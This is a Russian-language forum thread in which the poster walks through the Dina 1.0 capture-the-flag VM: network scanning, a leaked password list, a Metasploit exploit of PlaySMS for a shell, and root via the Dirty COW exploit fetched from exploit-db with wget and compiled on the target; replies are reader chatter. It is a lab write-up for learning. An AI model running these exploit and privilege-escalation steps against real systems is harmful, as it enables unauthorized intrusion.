![]() |
Всем привет! Появилась недавно идея совместного прохождения CTF с модератором @gx6060, буду выкладывать наши варианты прохождения, от простых к сложным с описанием техник. Я уже делал подобные обзоры в одиночку, но две головы интереснее.
Взяли несложную Dina 1.0. https://forum.antichat.xyz/attachmen...7510758133.png Для начала, как обычно немного разведки: Код: Код:
netdiscoverDina обнаружилась в сети под адресом 192.168.0.107, далее nmap: Код: Код:
nmap –sV –A 192.168.0.107Среди всей информации, интерес представляет директория /nothing, так как, при просмотре исходного кода мы находим список паролей: https://forum.antichat.xyz/attachmen...7510867065.png Ну и конечно, необходимо подключить nikto, т.к. больше ничего интересного не нашлось. Код: Код:
nikto –h 192.168.0.107Директория /secure содержит запароленный архив с бэкапом, нетрудно догадаться, что правильным будет один из паролей в найденном ранее списке. Содержимое архива – это файл MP3 который таковым не является, смотрим на него через notepad++ к примеру. https://forum.antichat.xyz/attachmen...7510914002.png Переходим по ссылке, нас встречает сервис PlaySMS, пароль опять подбираем из списка найденных. https://forum.antichat.xyz/attachmen...7510926310.png Прежде чем копать дальше, можно параллельно запустить поиск эксплоитов на этот сервис по Metasploit, Google тоже предлагает несколько вариантов эксплуатации, но этот вариант приемлемей: Код: Код:
msfconsoleПо описанию, этот эксплоит должен идеально подойти, задаем необходимые параметры для работы эксплойта: https://forum.antichat.xyz/attachmen...7510991006.png Запускаем: Код: Код:
exploitДве трети работы сделано, теперь необходимо подумать над вектором повышения привилегий, переходим в шелл и импортируем оболочку: Код: Код:
shellДолго думать не пришлось, вспомнил про firefart dirtycow exploit, мы имеем право записи в папку /tmp, туда его и скопируем: Код: Код:
wget https://www.exploit-db.com/download/40839.c --no-check-certificateПереименуем и скомпилируем: Код: Код:
gcc -pthread dirty.c -o dirty –lcryptЗапускаем эксплоит и вводим новый пароль, для ново созданного пользователя firefart: Код: Код:
./dirthyПереподключаемся к шеллу и меняем пользователя на firefart: Код: Код:
suТеперь осталось взять флаг: Код: Код:
cd /rootНа этом прохождение Diana 1.0. можно считать законченным. Спасибо за внимание. P.S. Можно было провернуть это и через гостевую сессию, и пройти ее минуты за полторы, но так неинтересно) https://forum.antichat.xyz/attachmen...7511220878.png |
Интересно...
|
Ищщщё!! )
|
Цитата:
выдает такое сообщение: |
Цитата:
|
Всё круто, для тупых объясните: это виртуальная машина? Где её можно скачать? Чтобы по вашим следам пробежаться))
|
Цитата:
Как скачает, спросит открыть ли с помощью vm, жмешь да. Готово. Далее по стопам ТС'а. |
Цитата:
|
Честно говоря сам только узнал про такую интересную тему как Capture The Flag. Очень интересно! Сейчас качаю другие. Буду пробовать додумать сам, хоть что-нибудь!
|
Перестал работать netdiscover...
Только роутер видит. Пробовал, зачем-то, запустить xerosploit, так и он перестал работать, просит xettercap, с которым ещё вчера проблем не было. С чего вдруг такое могло произойти? Как мне думается это произошло после того как я запустил команду apt-get dist-upgrade. До этого я сидел на версии кали 2017.1 Бывалые, поможите чем можИте? Я честно искал как исправить... |
| Время: 23:46 |